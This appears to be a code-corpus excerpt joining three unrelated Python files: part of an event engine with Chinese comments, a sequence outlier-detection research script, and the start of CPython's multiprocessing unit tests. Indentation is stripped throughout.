# 检查是否存在对该事件进行监听的处理函数
if event.type_ in self.__handlers:
# 若存在,则按顺序将事件传递给处理函数执行
[handler(event) for handler in self.__handlers[event.type_]]
# 以上语句为Python列表解析方式的写法,对应的常规循环写法为:
#for handler in self.__handlers[event.type_]:
#handler(event)
# 调用通用处理函数进行处理
if self.__generalHandlers:
[handler(event) for handler in self.__generalHandlers]
#----------------------------------------------------------------------
def __runTimer(self):
"""运行在计时器线程中的循环函数"""
while self.__timerActive:
# 创建计时器事件
event = Event(type_=EVENT_TIMER)
# 向队列中存入计时器事件
self.put(event)
# 等待
sleep(self.__timerSleep)
#----------------------------------------------------------------------
def start(self, timer=True):
"""
引擎启动
timer:是否要启动计时器
"""
# 将引擎设为启动
self.__active = True
# 启动事件处理线程
self.__thread.start()
# 启动计时器,计时器事件间隔默认设定为1秒
if timer:
self.__timerActive = True
self.__timer.start()
#----------------------------------------------------------------------
def stop(self):
"""停止引擎"""
# 将引擎设为停止
self.__active = False
# 停止计时器
self.__timerActive = False
self.__timer.join()
# 等待事件处理线程退出
self.__thread.join()
#----------------------------------------------------------------------
def register(self, type_, handler):
"""注册事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无defaultDict会自动创建新的list
handlerList = self.__handlers[type_]
# 若要注册的处理器不在该事件的处理器列表中,则注册该事件
if handler not in handlerList:
handlerList.append(handler)
#----------------------------------------------------------------------
def unregister(self, type_, handler):
"""注销事件处理函数监听"""
# 尝试获取该事件类型对应的处理函数列表,若无则忽略该次注销请求
handlerList = self.__handlers[type_]
# 如果该函数存在于列表中,则移除
if handler in handlerList:
handlerList.remove(handler)
# 如果函数列表为空,则从引擎中移除该事件类型
if not handlerList:
del self.__handlers[type_]
#----------------------------------------------------------------------
def put(self, event):
"""向事件队列中存入事件"""
self.__queue.put(event)
#----------------------------------------------------------------------
def registerGeneralHandler(self, handler):
"""注册通用事件处理函数监听"""
if handler not in self.__generalHandlers:
self.__generalHandlers.append(handler)
#----------------------------------------------------------------------
def unregisterGeneralHandler(self, handler):
"""注销通用事件处理函数监听"""
if handler in self.__generalHandlers:
self.__generalHandlers.remove(handler)
########################################################################
class Event:
"""事件对象"""
#----------------------------------------------------------------------
def __init__(self, type_=None):
"""Constructor"""
self.type_ = type_ # 事件类型
self.dict_ = {} # 字典用于保存具体的事件数据
#----------------------------------------------------------------------
# 直接运行脚本可以进行测试
if __name__ == '__main__':
def test():
"""测试函数"""
from datetime import datetime
def simpletest(event):
print(u'处理每秒触发的计时器事件:%s' % str(datetime.now()))
ee = EventEngine()
ee.register(EVENT_TIMER, simpletest)
ee.start()
test()
|
outlierDetection.py
|
#-*- coding: utf8
'''
Created on Aug 9, 2016
@author: zahran
'''
#from __future__ import division, print_function
from scipy.stats import chisquare
from collections import OrderedDict
from multiprocessing import Process, Queue
import pandas as pd
#import plac
import numpy as np
import math
import os.path
from MyEnums import *
from TestSample import *
from bokeh.colors import gold
from DetectionTechnique import *
'''
CORES = 1
PATH = '/Users/mohame11/Documents/myFiles/Career/Work/Purdue/PhD_courses/projects/tribeflow_outlierDetection/pins_repins_fixedcat/'
RESULTS_PATH = PATH+'sim_Pvalues/'
MODEL_PATH = PATH+'pins_repins_win10_noop_NoLeaveOut.h5'
TRACE_PATH = PATH + 'pins_repins_win10.trace'
SEQ_FILE_PATH = PATH+'simData_perUser5'
STAT_FILE = PATH+'catStats'
UNBIAS_CATS_WITH_FREQ = False
HISTORY_SIZE = 4
smoothingParam = 1.0 #smootihng parameter for unbiasing item counts.
seq_prob = SEQ_PROB.NGRAM
useWindow = USE_WINDOW.FALSE
'''
CORES = 1
PATH = '/Users/mohame11/Documents/myFiles/Career/Work/Purdue/PhD_courses/projects/outlierDetection/pins_repins_fixedcat/win4/'
RESULTS_PATH = PATH+'temp_pvalues/'
MODEL_PATH = PATH+'pins_repins_forLM_4gram.arpa'
TRACE_PATH = PATH + 'pins_repins_win10.trace'
SEQ_FILE_PATH = PATH+'simulatedData_4gram'
STAT_FILE = PATH+'catStats'
UNBIAS_CATS_WITH_FREQ = False
HISTORY_SIZE = 3
smoothingParam = 1.0 #smoothing parameter for unbiasing item counts.
seq_prob = SEQ_PROB.NGRAM
useWindow = USE_WINDOW.FALSE
DATA_HAS_USER_INFO = False #has no effect on tribeflow
VARIABLE_SIZED_DATA = True #has no effect on tribeflow
def getPvalueWithoutRanking(currentActionRank, keySortedProbs, probabilities):
#normConst = 0.0
#for i in range(len(probabilities)):
# normConst += probabilities[i]
cdf = 0.0
for i in range(currentActionRank+1):
cdf += probabilities[keySortedProbs[i]]
#prob = cdf/normConst
return cdf
#testDic, quota, coreId, q, store, true_mem_size, hyper2id, obj2id, Theta_zh, Psi_sz, smoothedProbs
def outlierDetection(coreTestDic, quota, coreId, q, myModel):
myCnt = 0
writer = open(RESULTS_PATH+'/outlier_analysis_pvalues_'+str(coreId),'w')
for user in coreTestDic:
for testSample in coreTestDic[user]:
myCnt += 1
seq = testSample.actions
goldMarkers = testSample.goldMarkers
#actions = myModel.obj2id.keys()
actions = myModel.getAllPossibleActions()
pValuesWithRanks = {}
pValuesWithoutRanks = {}
for i in range(len(seq)): #for all actions in the sequence.
#Take the action with index i and replace it with all possible actions
probabilities = {}
scores = {}
newSeq = list(seq)
#currentActionId = myModel.obj2id[newSeq[i]] #current action id
currentActionIndex = actions.index(newSeq[i])# the current action index in the action list.
#cal scores (an un-normalized sequence prob in tribeflow)
normalizingConst = 0
for j in range(len(actions)): #for all possible actions that can replace the current action
del newSeq[i]
newSeq.insert(i, actions[j])
userId = myModel.getUserId(user)
seqScore = myModel.getProbability(userId, newSeq)
scores[j] = seqScore
normalizingConst += seqScore
#cal probabilities
if(normalizingConst <= 1e-10000): #very small almost zero probability
break
for j in range(len(actions)): #for all possible actions that can replace the current action
probabilities[j] = float(scores[j])/float(normalizingConst)
#sorting ascendingly
keySortedProbs = sorted(probabilities, key=lambda k: (-probabilities[k], k), reverse=True)
currentActionRank = keySortedProbs.index(currentActionIndex)
currentActionPvalueWithoutRanks = getPvalueWithoutRanking(currentActionRank, keySortedProbs, probabilities)
currentActionPvalueWithRanks = float(currentActionRank+1)/float(len(actions))
pValuesWithRanks[i] = currentActionPvalueWithRanks
pValuesWithoutRanks[i] = currentActionPvalueWithoutRanks
if(len(seq) == len(pValuesWithoutRanks)):
writer.write('user##'+str(user)+'||seq##'+str(seq)+'||PvaluesWithRanks##'+str(pValuesWithRanks)+'||PvaluesWithoutRanks##'+str(pValuesWithoutRanks)+'||goldMarkers##'+str(goldMarkers)+'\n')
if(myCnt%100 == 0):
writer.flush()
print('>>> proc: '+ str(coreId)+' finished '+ str(myCnt)+'/'+str(quota)+' instances ...')
writer.close()
#ret = [chiSqs, chiSqs_expected]
#q.put(ret)
def distributeOutlierDetection():
myModel = None
if(seq_prob == SEQ_PROB.NGRAM):
myModel = NgramLM()
myModel.useWindow = useWindow
myModel.model_path = MODEL_PATH
myModel.true_mem_size = HISTORY_SIZE
myModel.SEQ_FILE_PATH = SEQ_FILE_PATH
myModel.DATA_HAS_USER_INFO = DATA_HAS_USER_INFO
myModel.VARIABLE_SIZED_DATA = VARIABLE_SIZED_DATA
myModel.loadModel()
if(seq_prob == SEQ_PROB.TRIBEFLOW):
myModel = TribeFlow()
myModel.useWindow = useWindow
myModel.model_path = MODEL_PATH
myModel.store = pd.HDFStore(MODEL_PATH)
myModel.Theta_zh = myModel.store['Theta_zh'].values
myModel.Psi_sz = myModel.store['Psi_sz'].values
myModel.true_mem_size = myModel.store['Dts'].values.shape[1]
myModel.hyper2id = dict(myModel.store['hyper2id'].values)
myModel.obj2id = dict(myModel.store['source2id'].values)
#myModel.trace_fpath = myModel.store['trace_fpath'][0][0]
myModel.trace_fpath = TRACE_PATH
myModel.UNBIAS_CATS_WITH_FREQ = UNBIAS_CATS_WITH_FREQ
myModel.STAT_FILE = STAT_FILE
myModel.SEQ_FILE_PATH=SEQ_FILE_PATH
myModel.DATA_HAS_USER_INFO = DATA_HAS_USER_INFO
myModel.VARIABLE_SIZED_DATA = VARIABLE_SIZED_DATA
if(UNBIAS_CATS_WITH_FREQ):
print('>>> calculating statistics for unbiasing categories ...')
myModel.calculatingItemsFreq(smoothingParam)
testDic,testSetCount = myModel.prepareTestSet()
print('Number of test samples: '+str(testSetCount))
myProcs = []
idealCoreQuota = testSetCount // CORES
userList = testDic.keys()
uid = 0
q = Queue()
for i in range(CORES):
coreTestDic = {}
coreShare = 0
while uid < len(userList):
coreShare += len(testDic[userList[uid]])
coreTestDic[userList[uid]] = testDic[userList[uid]]
uid += 1
if(coreShare >= idealCoreQuota):
#p = Process(target=outlierDetection, args=(coreTestDic, coreShare, i, q, myModel))
outlierDetection(coreTestDic, coreShare, i, q, myModel)
#myProcs.append(p)
testSetCount -= coreShare
leftCores = (CORES-(i+1))
if(leftCores >0):
idealCoreQuota = testSetCount // leftCores
print('>>> Starting process: '+str(i)+' on '+str(coreShare)+' samples.')
#p.start()
break
#myProcs.append(p)
for i in range(CORES):
myProcs[i].join()
print('>>> process: '+str(i)+' finished')
#results = []
#for i in range(CORES):
# results.append(q.get(True))
print('\n>>> All DONE!')
#store.close()
def main():
distributeOutlierDetection()
if __name__ == "__main__":
main()
#cProfile.run('distributeOutlierDetection()')
#plac.call(main)
print('DONE!')
|
_test_multiprocessing.py
|
#
# Unit tests for the multiprocessing package
#
import unittest
import unittest.mock
import queue as pyqueue
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import subprocess
import struct
import operator
import pickle
import weakref
import warnings
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
import threading
import pickle
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
from multiprocessing import shared_memory
HAS_SHMEM = True
except ImportError:
HAS_SHMEM = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 60.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
if os.name == "posix":
from multiprocessing import resource_tracker
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.monotonic()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.monotonic() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_parent_process_attributes(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
self.assertIsNone(self.parent_process())
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(target=self._test_send_parent_process, args=(wconn,))
p.start()
p.join()
parent_pid, parent_name = rconn.recv()
self.assertEqual(parent_pid, self.current_process().pid)
self.assertEqual(parent_pid, os.getpid())
self.assertEqual(parent_name, self.current_process().name)
@classmethod
def _test_send_parent_process(cls, wconn):
from multiprocessing.process import parent_process
wconn.send([parent_process().pid, parent_process().name])
def test_parent_process(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# Launch a child process. Make it launch a grandchild process. Kill the
# child process and make sure that the grandchild notices the death of
# its parent (a.k.a the child process).
rconn, wconn = self.Pipe(duplex=False)
p = self.Process(
target=self._test_create_grandchild_process, args=(wconn, ))
p.start()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "alive")
p.terminate()
p.join()
if not rconn.poll(timeout=60):
raise AssertionError("Could not communicate with child process")
parent_process_status = rconn.recv()
self.assertEqual(parent_process_status, "not alive")
@classmethod
def _test_create_grandchild_process(cls, wconn):
p = cls.Process(target=cls._test_report_parent_status, args=(wconn, ))
p.start()
time.sleep(300)
@classmethod
def _test_report_parent_status(cls, wconn):
from multiprocessing.process import parent_process
wconn.send("alive" if parent_process().is_alive() else "not alive")
parent_process().join(timeout=5)
wconn.send("alive" if parent_process().is_alive() else "not alive")
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@unittest.skipUnless(threading._HAVE_THREAD_NATIVE_ID, "needs native_id")
def test_process_mainthread_native_id(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current_mainthread_native_id = threading.main_thread().native_id
q = self.Queue(1)
p = self.Process(target=self._test_process_mainthread_native_id, args=(q,))
p.start()
child_mainthread_native_id = q.get()
p.join()
close_queue(q)
self.assertNotEqual(current_mainthread_native_id, child_mainthread_native_id)
@classmethod
def _test_process_mainthread_native_id(cls, q):
mainthread_native_id = threading.main_thread().native_id
q.put(mainthread_native_id)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
